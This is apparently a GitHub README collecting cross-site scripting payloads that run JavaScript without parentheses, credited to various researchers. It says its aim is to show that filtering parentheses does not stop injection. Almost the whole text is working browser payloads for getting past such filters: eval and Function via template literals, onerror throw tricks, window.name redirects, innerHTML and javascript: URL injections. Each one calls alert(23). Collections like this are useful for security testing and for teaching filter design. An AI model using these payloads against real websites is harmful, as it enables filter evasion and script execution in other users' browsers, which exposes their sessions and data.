XSS-Payloads

XSS Without parentheses ()

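This repo contains XSS payloads that don't require parentheses, collected from tweets, blogs and other sources. They show that a filter which strips or blocks `(` and `)` does not stop script execution once an injection point exists; the injection itself has to be prevented, for example with context-aware output encoding.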

All the PoCs display an alert box with the number 23.


alert`23`

window.name="javascript:alert(23)";
location="xss.html";

xss.html

location=name

Cure53

eval.call`${'alert\x2823\x29'}`

Renwa

eval.apply`${[`alert\x2823\x29`]}`

Bo0oM

setTimeout`alert\x2823\x29`
setInterval`alert\x2823\x29`

Garethheyes

onerror=alert;throw 23;

Garethheyes

'alert\x2823\x29'instanceof{[Symbol.hasInstance]:eval}

Only Chrome — Garethheyes

onerror=eval;throw'=alert\x2823\x29';

Garethheyes

{onerror=alert}throw 23

Garethheyes

[][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]][[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[[]+{}][+[]][+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[![]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[!![]+[]][+[]][+!+[]]+[[][[]]+[]][+[]][+[]]+[[][[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[[][[]]+[]][+[]][!+[]+!+[]]]+[]][+[]][!+[]+!+[]+!+[]]+[!![]+[]][+[]][+[]]+[[]+{}][+[]][+!+[]]+[!![]+[]][+[]][+!+[]]]`$${[!{}+[]][+[]][+!+[]]+[!{}+[]][+[]][+!+[]+!+[]]+[!{}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}$```//Function(alert(1))

terjanq

xss_redir.html

window.name='1;var Uncaught=1;alert(23)';
location='xss_short.html';

xss_short.html

{onerror=eval}throw/0/+name

terjanq

example.com/#1/-alert(23)/
onhashchange=setTimeout;
Object.prototype.toString=RegExp.prototype.toString;
Object.prototype.source=location.hash;
location.hash=null;

terjanq

throw/a/,Uncaught=1,g=alert,a=g+0,onerror=eval,/1/g+a[14]+[23,331,337]+a[15]

terjanq

window.name="alert(23)";
location="xss.html";

xss.html

Function`a${name}```

terjanq

Put %0aalert(/23/)// anywhere in the URL

location='javascript:'+location
location=/javascript:/.source+location
location=`javascript:`+location

terjanq

x={...eval+0,toString:Array.prototype.shift,length:15},
x+x+x+x+x+x+x+x+x+x+x+x+x,
location = /javascript:/.source + alert.name+x+23+x

terjanq

example.com/xss?%0aalert(/23/)//


Function`a${unescape. call`${location}`}```

aemkei

onhashchange=setTimeout;
HashChangeEvent.prototype.toString=
RegExp.prototype.toString;
location.hash=
HashChangeEvent.prototype.source=
'1/-alert\5023\51/';

aemkei

onload=setTimeout
Event.prototype.toString=
_=>"alert\5023\51"

aemkei

throw/**/Uncaught=window.onerror=eval,";alert\5023\51"

Gareth Heyes

x=new DOMMatrix;
matrix=alert;
x.a=23;
location='javascript'+':'+x

BitK

Function`a${`alert${Function`a${`return fromCharCode`}{fromCharCode}``${String}``40`}23${Function`a${`return fromCharCode`}{fromCharCode}``${String}``41`}`}```

BitK

range = document.createRange``; 
range.createContextualFragment`<img src=x onerror=alert\x2823\x29>'`;

BitK

Function`a${`${Function`a${`return from`}{from}``${Array}``96${Function`a${`return fromCharCode`}{fromCharCode}``${String}`}`}${Function`a${`return fromCharCode`}{fromCharCode}``${String}``${96}${10}${97}${108}${101}${114}${116}${40}${50}${51}${41}`}`}```

albinowax

window.name="alert(23)"
location="xss.html"

xss.html

eval.constructor`eval\x28name\x29```

hasegawayosuke

window.name="alert(23)"
location="xss.html"

xss.html

[].every.call`eval\x28name\x29${eval}`

Tomer Zait

[]["filter"]["constructor"]`alert\x2823\x29```

Pepe Vila

Array.prototype[Symbol.hasInstance]=eval;
"alert\x2823\x29" instanceof [];

RootEval

x='javascript:alert\x2823\x29';x={x:location}=this

iwasakinoriaki

window.name="alert(23)"
location="xss.html"

xss.html

eval.call`${top.name}`

Cure53

window.name="<img src=x onerror=alert(23)>"
location="xss.html"

xss.html

document.write`${top.name}`

mage_1868

location="https://example.com/xss.html/.source;alert(23)?xss="

example.com

eval.call`${location.pathname}`

Only Firefox — Garethheyes

{onerror=eval}throw{lineNumber:1,columnNumber:1,fileName:'',message:'alert\x2823\x29'}

ycam

example.com/xss#*/;alert(23);
throw/**/onerror=Uncaught=eval,e={lineNumber:1,columnNumber:1,fileName:'',message:'/*'+location.hash},typeof/**/InstallTrigger!='undefined'?e:e.message

cgvwzq

https://demo.vwzq.net/lol.html

<script/id=Uncaught>

// chrome + firefox

throw[onerror=eval][e=[x='+alert\x2823\x29']]=0[e.lineNumber=e.columnNumber=e.fileName=e.message=x]=e

</script>

<script>

// firefox

onhashchange=setTimeout,HashChangeEvent.prototype[Symbol.toStringTag]='+alert\x2823\x29',location.hash=1

</script>

<script>

// chrome + firefox

Array.prototype[Symbol.hasInstance]=eval,'alert\x2823\x29'instanceof[]

</script>

<script>

// chrome

[onerror=eval][TypeError.prototype.name='=/']['/-alert\x2823\x29//']

</script>


<script>

// chrome

onerror=eval,ReferenceError.prototype.name='=alert\x2823\x29//',lol

</script>

Renwa

document.body.innerHTML="\u003cimg src=x onerror=alert\u002823\u0029\u003e";

Renwa

document.body.innerHTML="&ltimg src=x onerror=alert&lpar;23&rpar;&gt"
document.body.innerHTML=document.body.innerText

If the page is frameable — Renwa

data:text/html,<iframe name="<svg/onload=alert(23)>" src="http://example.com/xss?document.body.innerHTML=name">

user00239123

document.location='javascript:alert%2823%29'

Only IE — matt

example.com/xss#<img src=x onerror=alert(23)>

document.body.innerHTML=location.hash;

Brutelogic

<svg/onload='alert&#40 23 &#41'> 

Blakils

location=/javascript:alert%2823%29/.source;

Nicocanicolas

http://example.com/?test=&lt;img/src=&quot;x&quot;/onerror=alert(23)&gt;

document.body.innerHTML=location.search;
document.body.innerHTML=document.body.innerText;


Anything: @RenwaX23

来源:
https://github.com/RenwaX23/XSS-Payloads/edit/master/Without-Parentheses.md
